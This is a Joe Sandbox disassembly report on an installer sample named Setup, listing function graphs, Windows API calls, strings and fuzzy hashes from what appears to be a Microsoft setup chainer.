                                                                                              control_flow_graph 2228 6c5d2c9b-6c5d2ccc 2229 6c5d2cce-6c5d2cd4 2228->2229 2230 6c5d2cda-6c5d2cdd 2228->2230 2229->2230 2231 6c5e1464-6c5e146e 2229->2231 2232 6c5d2ce3-6c5d2ce5 2230->2232 2233 6c5e1491-6c5e149b 2230->2233 2236 6c5e1487-6c5e148c 2231->2236 2237 6c5e1470-6c5e1473 2231->2237 2234 6c5d3b28-6c5d3b5d memset call 6c5d18e5 2232->2234 2235 6c5d2ceb-6c5d2ced 2232->2235 2238 6c5d2dd1 2233->2238 2239 6c5e14a1-6c5e14a5 2233->2239 2255 6c5e14c2-6c5e14ce 2234->2255 2256 6c5d3b63-6c5d3b7d OpenFileMappingW 2234->2256 2242 6c5e160c-6c5e1616 2235->2242 2243 6c5d2cf3-6c5d2d0f VirtualAlloc 2235->2243 2245 6c5d2dd3-6c5d2de1 call 6c5d171f 2236->2245 2237->2236 2244 6c5e1475-6c5e1482 call 6c5e5f11 2237->2244 2238->2245 2239->2238 2240 6c5e14ab-6c5e14bd call 6c5e5f11 2239->2240 2240->2238 2250 6c5e1618-6c5e161c 2242->2250 2251 6c5e1630 2242->2251 2248 6c5d2d15 2243->2248 2249 6c5e15a7-6c5e15b1 2243->2249 2244->2236 2257 6c5d2d1f-6c5d2d2f 2248->2257 2260 6c5e15b3-6c5e15b7 2249->2260 2261 6c5e1550-6c5e155a GetLastError 2249->2261 2250->2251 2258 6c5e161e-6c5e1623 2250->2258 2259 6c5e1635-6c5e163a 2251->2259 2263 6c5e14e9-6c5e14ee 2255->2263 2264 6c5e14d0-6c5e14d4 2255->2264 2265 6c5e14f3-6c5e14f5 2256->2265 2266 6c5d3b83-6c5d3b85 2256->2266 2257->2238 2267 6c5d2d35-6c5d2d57 call 6c5d2a40 VirtualAlloc 2257->2267 2270 6c5e1625-6c5e162b call 6c5e5f11 2258->2270 2271 6c5e165f-6c5e1665 2259->2271 2272 6c5e163c-6c5e1642 2259->2272 2260->2261 2273 6c5e15b9-6c5e15c4 2260->2273 2268 6c5e15fa-6c5e160a GetLastError 2261->2268 2269 6c5e1560-6c5e1564 GetLastError 2261->2269 2263->2259 2264->2263 2276 6c5e14d6-6c5e14e4 call 6c5e99f8 2264->2276 2280 6c5d3bbe-6c5d3bd5 MapViewOfFile 2265->2280 2281 6c5e14fb-6c5e1505 2265->2281 2277 6c5d3b8b-6c5d3bae CreateFileMappingW 2266->2277 2278 6c5e1584-6c5e158e 2266->2278 2297 6c5d2d5d-6c5d2dce call 6c5d2de9 * 2 2267->2297 2298 6c5e15d6-6c5e15e0 2267->2298 2268->2259 2269->2259 2270->2251 2274 6c5e1667-6c5e167b VirtualFree 2271->2274 2275 6c5e16a1-6c5e16a7 2271->2275 2283 6c5e1644-6c5e164a UnmapViewOfFile 2272->2283 2284 6c5e1650-6c5e165d CloseHandle 2272->2284 2285 6c5e15c6-6c5e15d1 call 6c5e99f8 2273->2285 2274->2275 2286 6c5e167d-6c5e1687 2274->2286 2275->2245 2276->2263 2288 6c5e152c-6c5e1536 2277->2288 2289 6c5d3bb4 2277->2289 2278->2251 2292 6c5e1594-6c5e1598 2278->2292 2280->2257 2291 6c5d3bdb-6c5e1573 2280->2291 2281->2280 2293 6c5e150b-6c5e150f 2281->2293 2283->2284 2284->2275 2285->2261 2286->2275 2296 6c5e1689-6c5e168d 2286->2296 2288->2261 2302 6c5e1538-6c5e153c 2288->2302 2289->2280 2291->2261 2306 6c5e1575-6c5e1579 2291->2306 2292->2251 2300 6c5e159e-6c5e15a5 2292->2300 2293->2280 2301 6c5e1515-6c5e1527 call 6c5e5f11 2293->2301 2296->2275 2305 6c5e168f-6c5e169c call 6c5e5f11 2296->2305 2297->2238 2298->2261 2304 6c5e15e6-6c5e15ea 2298->2304 2300->2270 2301->2280 2302->2261 2303 6c5e153e-6c5e1543 2302->2303 2309 6c5e1545-6c5e154b call 6c5e5f11 2303->2309 2304->2261 2310 6c5e15f0-6c5e15f8 2304->2310 2305->2275 2306->2261 2312 6c5e157b-6c5e1582 2306->2312 2309->2261 2310->2285 2312->2309
                                                                                              APIs
                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00002000,00000004,6C5D27B0,00000000,6C5F0088), ref: 6C5D2D01
                                                                                              • VirtualAlloc.KERNEL32(?,00000000,00001000,00000004,000003F8,00000000,?,?,?,?,6C5D27B0,00000000,6C5F0088), ref: 6C5D2D4F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocVirtual
                                                                                              • String ID: Local\SqmData_%s
                                                                                              • API String ID: 4275171209-1264235261
                                                                                              • Opcode ID: 525d109ef3d091c74afc41b4a65041a618fc9314acc00919b56478ae9f602fc1
                                                                                              • Instruction ID: 69263dc961d40c0c39ffd41d7a682219c029fdc0d18abce755b8ca40b70fe693
                                                                                              • Opcode Fuzzy Hash: 525d109ef3d091c74afc41b4a65041a618fc9314acc00919b56478ae9f602fc1
                                                                                              • Instruction Fuzzy Hash: 10B1A1706003409FDB548F25CC84F5737F5BB49348F2584A9E56ADBAA2DB71E889CF48
                                                                                              Function 6395671F Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 196windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63956726
                                                                                                • Part of subcall function 63951E75: __EH_prolog3.LIBCMT ref: 63951E7C
                                                                                                • Part of subcall function 63951E75: GetThreadLocale.KERNEL32(?,00000004,63956734,0000004C,0000004C,63957142,?,00000000), ref: 63951E8E
                                                                                              • PathIsRelativeW.SHLWAPI(?,0000004C,0000004C,63957142,?,00000000), ref: 63956745
                                                                                              • PathFileExistsW.SHLWAPI(?), ref: 63956751
                                                                                              • PathFileExistsW.KERNELBASE(?,?,?), ref: 63956790
                                                                                              • PathFileExistsW.KERNELBASE(?), ref: 63956795
                                                                                              • __CxxThrowException@8.LIBCMT ref: 639568B8
                                                                                              • SendMessageW.USER32(?,00000449), ref: 639568F2
                                                                                              • CloseHandle.KERNELBASE(63978364), ref: 63956908
                                                                                              • CloseHandle.KERNEL32(63978364,?,00000000), ref: 6395691E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Path$ExistsFile$CloseH_prolog3Handle$Exception@8LocaleMessageRelativeSendThreadThrow
                                                                                              • String ID: ParameterInfo.xml$Successfuly found file %s $can't open EULA file: $^wu
                                                                                              • API String ID: 4048475142-837317394
                                                                                              • Opcode ID: 41ff3a7ab8cc61a9335f8d1c6367d4c7ce28462c3b6514e1e67f05ba15ae9ff7
                                                                                              • Instruction ID: 1649de9f290213803487d42dc80e119321e5b6e4a83adf2e20ab18c888fda467
                                                                                              • Opcode Fuzzy Hash: 41ff3a7ab8cc61a9335f8d1c6367d4c7ce28462c3b6514e1e67f05ba15ae9ff7
                                                                                              • Instruction Fuzzy Hash: C6714A72900208EFDF00DFA8C980ADEBBB8AF5AB28F148155F510BB291D734DA55CF61
                                                                                              Function 63955163 Relevance: 22.0, APIs: 1, Strings: 11, Instructions: 1046COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6395516A
                                                                                                • Part of subcall function 6395396A: __EH_prolog3.LIBCMT ref: 63953971
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                                • Part of subcall function 6394D7DD: __EH_prolog3.LIBCMT ref: 6394D7E4
                                                                                                • Part of subcall function 6394D7DD: SysFreeString.OLEAUT32(00000000), ref: 6394D83A
                                                                                                • Part of subcall function 639525B2: __EH_prolog3.LIBCMT ref: 639525B9
                                                                                                • Part of subcall function 63953AD4: __EH_prolog3.LIBCMT ref: 63953ADB
                                                                                                • Part of subcall function 6395507E: __EH_prolog3.LIBCMT ref: 63955085
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$FreeString
                                                                                              • String ID: CreateLayout$Failure$Install$NothingApplies$Repair$Static$Success$SysLink$Uninstall$UninstallPatch$~
                                                                                              • API String ID: 2872891630-930184743
                                                                                              • Opcode ID: 1db3b8c202ed956418cfd7b24a5ebcbdab09132e84faa51a2cd3273157b8a2d8
                                                                                              • Instruction ID: 015641a0f6741aaa971182778fa8041b82b8dd372ed4968b8d67ba330c62d05a
                                                                                              • Opcode Fuzzy Hash: 1db3b8c202ed956418cfd7b24a5ebcbdab09132e84faa51a2cd3273157b8a2d8
                                                                                              • Instruction Fuzzy Hash: 49927D7180024DEFDB05DBF8C944EDEBBB8AF19728F144189F165A7282DB30DA49DB61
                                                                                              Function 6C8CBB3C Relevance: 21.3, APIs: 2, Strings: 10, Instructions: 260COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8CBB43
                                                                                                • Part of subcall function 6C8F833E: __EH_prolog3.LIBCMT ref: 6C8F8345
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6C8CBDEB
                                                                                              Strings
                                                                                              • BlockingMutex, xrefs: 6C8CBC9D
                                                                                              • ParameterInfo.xml, xrefs: 6C8CBD6A
                                                                                              • DownloadInstallSetting, xrefs: 6C8CBC4B
                                                                                              • UserExperienceDataCollection, xrefs: 6C8CBBF8
                                                                                              • Using Serial Download and Install mechanism, xrefs: 6C8CBDFA
                                                                                              • Using Simultaneous Download and Install mechanism, xrefs: 6C8CBE01
                                                                                              • DisabledCommandLineSwitches, xrefs: 6C8CBB52
                                                                                              • FilesInUseSetting, xrefs: 6C8CBCEF
                                                                                              • schema validation failure: there must be a valid child element for Configuration., xrefs: 6C8CBD5C
                                                                                              • AdditionalCommandLineSwitches, xrefs: 6C8CBBA6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$Exception@8Throw
                                                                                              • String ID: AdditionalCommandLineSwitches$BlockingMutex$DisabledCommandLineSwitches$DownloadInstallSetting$FilesInUseSetting$ParameterInfo.xml$UserExperienceDataCollection$Using Serial Download and Install mechanism$Using Simultaneous Download and Install mechanism$schema validation failure: there must be a valid child element for Configuration.
                                                                                              • API String ID: 2489616738-904804324
                                                                                              • Opcode ID: a32d149fa5434ebfaa979d1ea673efd4b457d0a8ae1d4d360f3b49367b1a746c
                                                                                              • Instruction ID: 19ff880ac05f6c1b35a40570c0035f7afda6d11be170b141d04f25f44ff6fe07
                                                                                              • Opcode Fuzzy Hash: a32d149fa5434ebfaa979d1ea673efd4b457d0a8ae1d4d360f3b49367b1a746c
                                                                                              • Instruction Fuzzy Hash: 3EA15F71604249EFCB14DFA8CA45AEEBBB9BF15318F144959F424E7780C734EA05CBA2
                                                                                              Function 639570F9 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 215COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,00000065), ref: 63957136
                                                                                                • Part of subcall function 6395671F: __EH_prolog3.LIBCMT ref: 63956726
                                                                                                • Part of subcall function 6395671F: PathIsRelativeW.SHLWAPI(?,0000004C,0000004C,63957142,?,00000000), ref: 63956745
                                                                                                • Part of subcall function 6395671F: PathFileExistsW.SHLWAPI(?), ref: 63956751
                                                                                                • Part of subcall function 6395671F: __CxxThrowException@8.LIBCMT ref: 639568B8
                                                                                              • GetDlgItem.USER32(?,00000068), ref: 63957146
                                                                                                • Part of subcall function 6394EDAE: SetWindowTextW.USER32(?,?), ref: 6394EDC5
                                                                                              • GetDlgItem.USER32(?,00000069), ref: 63957159
                                                                                              • ShowWindow.USER32(?,00000000,?,?,?,?,?,?,?,?,6397677E,000000FF), ref: 63957181
                                                                                                • Part of subcall function 6395F532: __EH_prolog3.LIBCMT ref: 6395F539
                                                                                                • Part of subcall function 6395F532: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,6397677E,000000FF), ref: 6395F555
                                                                                                • Part of subcall function 63956615: CreateWindowExW.USER32(00000008,tooltips_class32,00000000,80000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 63956636
                                                                                                • Part of subcall function 63956615: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,639572CF), ref: 63956648
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                              • SetDlgItemTextW.USER32(?,00000068,00000000), ref: 639571AF
                                                                                              • SetDlgItemTextW.USER32(?,00000069,00000000), ref: 639571E7
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 63957263
                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 63957272
                                                                                              • GetDlgItem.USER32(?,00000066), ref: 639572FC
                                                                                                • Part of subcall function 63956655: __EH_prolog3_GS.LIBCMT ref: 6395665C
                                                                                                • Part of subcall function 63956655: _memset.LIBCMT ref: 639566C3
                                                                                                • Part of subcall function 63956655: GetClientRect.USER32 ref: 639566E6
                                                                                                • Part of subcall function 63956655: SendMessageW.USER32(00000001,00000432,00000000,?), ref: 639566FC
                                                                                              • GetDlgItem.USER32(?,00000067), ref: 63957352
                                                                                                • Part of subcall function 63956655: RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,?,00000040,6395730F,?,?,?,?,?,?,?,?,?), ref: 63956713
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Item$Window$H_prolog3Text$LongPath$ClientCreateErrorExceptionException@8ExistsFileH_prolog3_LastMessageRaiseRectRelativeSendShowThrow_memset
                                                                                              • String ID: IDS_PRINT$IDS_SAVE
                                                                                              • API String ID: 3758966775-3437764585
                                                                                              • Opcode ID: a9225414768022e3b8beff55024ae4163d2d6b95e2e2c10ff5ae7dc1fde7973e
                                                                                              • Instruction ID: fe3a18f9c52e1ae3bfa08cf0852f00b4bc381985dd7f33ff2b49746599b002fb
                                                                                              • Opcode Fuzzy Hash: a9225414768022e3b8beff55024ae4163d2d6b95e2e2c10ff5ae7dc1fde7973e
                                                                                              • Instruction Fuzzy Hash: 128155396047019FCB04EF68C888A5ABBE6FF9A714F104A68F556DB3A1DB30E855CF41
                                                                                              Function 63966525 Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 199comCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6396652C
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                                • Part of subcall function 6395E93B: __EH_prolog3.LIBCMT ref: 6395E942
                                                                                              • CoInitialize.OLE32(00000000), ref: 63966596
                                                                                                • Part of subcall function 6396697A: __EH_prolog3.LIBCMT ref: 63966981
                                                                                                • Part of subcall function 6396697A: CoCreateInstance.OLE32(63947980,00000000,00000017,63947970,?,?,00000068,639665A6,?,?,?,?,63962A30,?,00000000,?), ref: 639669AC
                                                                                              • CoCreateInstance.OLE32(63947930,00000000,00000017,63947970,00000001,?,?,?,?,63962A30,?,00000000,?,00000000,00000000,?), ref: 639665BE
                                                                                              • CoUninitialize.OLE32(00000001,?,00000000,00000000,?,?,succeeded,?,?,?,63962A30,?,00000000,?,00000000,00000000), ref: 639666DE
                                                                                              • __CxxThrowException@8.LIBCMT ref: 63966773
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$CreateInstance$Exception@8H_prolog3_catchInitializeThrowUninitialize
                                                                                              • String ID: exiting function/method$Entering Function$IronMan::UiDataT<class IronMan::CCmdLineSwitches>::CreateUiDataT$UIInfo.xml$Xml Document load failure$succeeded$threw exception
                                                                                              • API String ID: 4239111664-3845428783
                                                                                              • Opcode ID: 74267141f97c7785ff53deeec89ee6335bd7471bee8bba2d8dab595637ec0167
                                                                                              • Instruction ID: f2bd8cfda1c98b0db13f9178fd6800411ed766ad1edbeda0e6f932c87bd83beb
                                                                                              • Opcode Fuzzy Hash: 74267141f97c7785ff53deeec89ee6335bd7471bee8bba2d8dab595637ec0167
                                                                                              • Instruction Fuzzy Hash: 9F815B71901248EFEB01DFE8C884ADEBBB8AF5AB18F148059F554EB242D735DA45CF60
                                                                                              Function 6395757C Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 149windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63957583
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6395761F
                                                                                              • GetParent.USER32(?), ref: 6395765D
                                                                                              • SendMessageW.USER32(00000000,00000472,00000000,00000069), ref: 6395766C
                                                                                                • Part of subcall function 639512AB: CloseHandle.KERNEL32(?,?,6395BB96), ref: 639512BC
                                                                                              • GetParent.USER32(?), ref: 63957682
                                                                                                • Part of subcall function 6394F415: GetDlgItem.USER32(?,00003024), ref: 6394F479
                                                                                                • Part of subcall function 6394F415: GetWindowLongW.USER32(00000000,000000EB), ref: 6394F484
                                                                                                • Part of subcall function 6394F415: SetWindowLongW.USER32(00000000,000000EB,00000001), ref: 6394F4C4
                                                                                                • Part of subcall function 639577A9: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 639577CF
                                                                                                • Part of subcall function 639683FD: _memcpy_s.LIBCMT ref: 6396844E
                                                                                                • Part of subcall function 6395FB4F: __EH_prolog3.LIBCMT ref: 6395FB56
                                                                                                • Part of subcall function 6395FB4F: GetParent.USER32(00000001), ref: 6395FB6B
                                                                                                • Part of subcall function 6395FB4F: SendMessageW.USER32(00000000,00000481,00000001,00000000), ref: 6395FB78
                                                                                                • Part of subcall function 6395FB4F: GetParent.USER32(00000001), ref: 6395FBB5
                                                                                                • Part of subcall function 6395FB4F: SendMessageW.USER32(00000000,0000047E,?,?), ref: 6395FBC1
                                                                                                • Part of subcall function 6395FB4F: GetParent.USER32(00000001), ref: 6395FBD3
                                                                                                • Part of subcall function 6395FB4F: SendMessageW.USER32(00000000,00000480,?,?), ref: 6395FBDF
                                                                                              • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 63957702
                                                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 63957720
                                                                                              • SetWindowLongW.USER32(000000FF,000000F4,00000066), ref: 6395772D
                                                                                              • GetParent.USER32(000000FF), ref: 6395773C
                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 63957742
                                                                                              • PostMessageW.USER32(000000FF,000006F5,00000000,00000000), ref: 63957752
                                                                                              Strings
                                                                                              • Failed to initialize items information. engineDataProvider.InitializeItems() returned false, xrefs: 639575AF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$ParentSend$Window$Long$H_prolog3$CallbackCloseDispatcherException@8HandleItemPostTextThrowUser_memcpy_s
                                                                                              • String ID: Failed to initialize items information. engineDataProvider.InitializeItems() returned false
                                                                                              • API String ID: 1640968947-1354499266
                                                                                              • Opcode ID: d1aed0ea177a564d6fc2ca64155857cec1c1e314855af05f3ff45e2ab8c73be8
                                                                                              • Instruction ID: d1f095aadf48fb7928711be632d562bcd742d5a9cf7189e17eae9fd01c890d1e
                                                                                              • Opcode Fuzzy Hash: d1aed0ea177a564d6fc2ca64155857cec1c1e314855af05f3ff45e2ab8c73be8
                                                                                              • Instruction Fuzzy Hash: 02514C71904205DFDB10EFA4C988A9E7BB8BF0A724F1441A4F955AF2A2DB31DD50CFA0
                                                                                              Function 6C8C787B Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 96registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6C8C7882
                                                                                              • RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\PCHealth\ErrorReporting\DW\Installed,00000000,00020019,?,00000014,6C8C781A,?,6C8F831D,00000000), ref: 6C8C78B2
                                                                                              • RegQueryValueExW.ADVAPI32(?,DW0200,00000000,00000000,?,?,?,6C8F831D,00000000), ref: 6C8C78D8
                                                                                              • RegCloseKey.ADVAPI32(?,?,6C8F831D,00000000), ref: 6C8C78E4
                                                                                              • GetFileAttributesW.KERNEL32(?,?,6C8F831D,00000000), ref: 6C8C78F9
                                                                                              • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,?,?,6C8F831D,00000000), ref: 6C8C790E
                                                                                              • GetFileAttributesW.KERNEL32(?,?,6C8F831D,00000000), ref: 6C8C7931
                                                                                              • GetFileAttributesW.KERNEL32(?,?,6C8F831D,00000000), ref: 6C8C798A
                                                                                              Strings
                                                                                              • DW0200, xrefs: 6C8C78C9
                                                                                              • DW\DW20.exe, xrefs: 6C8C795E
                                                                                              • \Microsoft Shared\DW\DW20.exe, xrefs: 6C8C791D
                                                                                              • Software\Microsoft\PCHealth\ErrorReporting\DW\Installed, xrefs: 6C8C78A8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2636528822.000000006C8A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2636411576.000000006C8A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636855498.000000006C94E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2636987218.000000006C94F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637111199.000000006C957000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.2637251369.000000006C95A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c8a0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile$CloseFolderH_prolog3OpenPathQueryValue
                                                                                              • String ID: DW0200$DW\DW20.exe$Software\Microsoft\PCHealth\ErrorReporting\DW\Installed$\Microsoft Shared\DW\DW20.exe
                                                                                              • API String ID: 2337823764-2373061612
                                                                                              • Opcode ID: 2816d88f6774bd2adb35dbac9a79b7bcb4669c855ccf5f1acf065ed645d5b5dd
                                                                                              • Instruction ID: 8e3e09c3e95c28c8a91ae1c95219010ed265538b71b198dd64cab0dd9c6e17c9
                                                                                              • Opcode Fuzzy Hash: 2816d88f6774bd2adb35dbac9a79b7bcb4669c855ccf5f1acf065ed645d5b5dd
                                                                                              • Instruction Fuzzy Hash: D7319670A1020DEFDF108FE5CD85ABFB679BF1531DF100A24E520A6690D738D955DBA2
                                                                                              Function 6394D923 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 228memoryfileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6394D92A
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                              • PathIsRelativeW.SHLWAPI(00000000,00000000,?,00000000,00000008,6395E271,00000000,?,?,00000DF0,?,?), ref: 6394D960
                                                                                              • GetModuleFileNameW.KERNEL32(00000010,00000104,?,00000000,00000008,6395E271,00000000,?,?,00000DF0,?,?), ref: 6394D9BA
                                                                                              • PathCombineW.SHLWAPI(?,?,?,00000000,?,00000000,00000008,6395E271,00000000,?,?,00000DF0,?,?), ref: 6394DA0D
                                                                                              • __CxxThrowException@8.LIBCMT ref: 6394DAAF
                                                                                              • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001,?,00000000,00000000,00000002,?,80000000,00000001,00000003,00000080,00000000,00000000), ref: 6394DAD0
                                                                                              • SysAllocStringLen.OLEAUT32(00000000,?), ref: 6394DB07
                                                                                              • ReadFile.KERNELBASE(?,?,?,?,00000000,?,00000000,00000008,6395E271,00000000,?,?,00000DF0,?,?), ref: 6394DB38
                                                                                              • CloseHandle.KERNELBASE(?,?,00000000,00000008,6395E271,00000000,?,?,00000DF0,?,?), ref: 6394DBB5
                                                                                              Strings
                                                                                              • Could not find mandatory data file %s. This is a bad package., xrefs: 6394DB6E
                                                                                              • ReadXML failed to open XML file %s, with error %d, xrefs: 6394DA8B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
